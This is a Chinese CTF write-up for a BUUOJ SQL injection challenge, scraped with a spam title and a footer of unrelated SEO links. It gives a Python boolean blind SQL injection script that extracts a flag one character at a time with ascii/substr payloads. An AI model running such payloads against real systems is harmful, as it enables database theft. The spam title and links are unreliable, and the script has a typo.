当前位置: 首页 > news >正文

做网站建设需要做哪些工作室泰安seo推广

做网站建设需要做哪些工作室,泰安seo推广,wordpress导入模板文件,做网站从设计到上线流程1、通过题目,可以知道该题目为SQL注入类型: 2、判断注入类型为数字注入: 3、通过BP抓包,来判断注入点。 字典爆破发现常规的注入方式都被过滤。 4、因此可以尝试通过布尔盲注的方式来得到flag。编写脚本得到flag import requests…

1、通过题目,可以知道该题目为SQL注入类型:

2、判断注入类型为数字注入:

3、通过BP抓包,来判断注入点。

字典爆破发现常规的注入方式都被过滤。

4、因此可以尝试通过布尔盲注的方式来得到flag。编写脚本得到flag

import requests

url = "http://977ba0f7-8772-4617-9600-8089c3d7e1e3.node5.buuoj.cn:81/index.php"
result = ""
for i in range(1, 50):
        for j in range(32, 128):
                payload = "(ascii(substr((select(flag)from(flag)),{m},1))>{n})"
                response = requests.post(url=url, data={'id': payload.format(m=i, n=j)})
# {m} 是当前正在提取的 flag 字符位置,{n} 是 ASCII 码值,用于比较。
                f response.text.find('girl') == -1:
                        result += chr(j)
                        print(j)
                        break
        print("正在输出flag:", result)
print("flag:", result)

#外层循环 (for i in range(1, 50)):循环遍历 flag 的每个字符位置,假设 flag 最长为 50 个字符。
#内层循环 (for j in range(32, 128)):循环遍历 ASCII 字符集中的可打印字符(从空格到 '~')。
#payload 变量:构造了一个 SQL 注入 payload,使用 substr() 函数逐个提取 flag 的字符,并通过 ascii() 函数转换为 ASCII 码值,然后与 j 比较。

5、得到flag:

http://www.ds6.com.cn/news/11226.html

相关文章:

  • xcache wordpress沧州网站建设优化公司
  • 正能量无遮掩图片全屏seo网络营销课程
  • 手工品外贸出口网站建设方案网址怎么注册
  • 网站用开源cms朝阳seo搜索引擎
  • 微博分享的网站怎么做网站整站优化公司
  • 学习做网站是什么专业游戏优化软件
  • 欧美网站模板下载网址申请注册
  • 网站开发5人小组分工公司建网站需要多少钱
  • 网站首页开发网站优化公司怎么选
  • 怎么做的360网站打不开手机最新产品新闻
  • 昆明网站建设是什么意思qq推广引流网站
  • 网站开发入门东莞网络推广托管
  • 湘潭做网站口碑好磐石网络深圳百度推广客服电话多少
  • 网站源码上传教程免费h5制作网站
  • 石家庄住房城乡建设网站如何做谷歌seo推广
  • 网站 可以做无形资产吗seo排名是什么意思
  • 深圳自适应网站开发多少钱自媒体运营主要做什么
  • 陕西农产品网站建设互联网营销成功案例
  • 高端医疗器械网站源码网络推广一般怎么收费
  • 优惠购网站怎么做的百度竞价是什么意思
  • 网站建设优化服务如何厦门人才网官方网站
  • 网站建设 app 优化网络广告推广方式
  • 遂宁市做网站的公司推广关键词如何优化
  • 穷人没本钱怎么创业北京seo案例
  • 做网站品企业如何进行网络营销
  • 网上申请个人营业执照网站windows优化大师好用吗
  • 公司做网站公司网站优化网站优化
  • 文化网站源码seo入门版
  • 政府网站数字化建设b2b平台是什么意思
  • 东莞什么行业做网站的多网络推广营销公司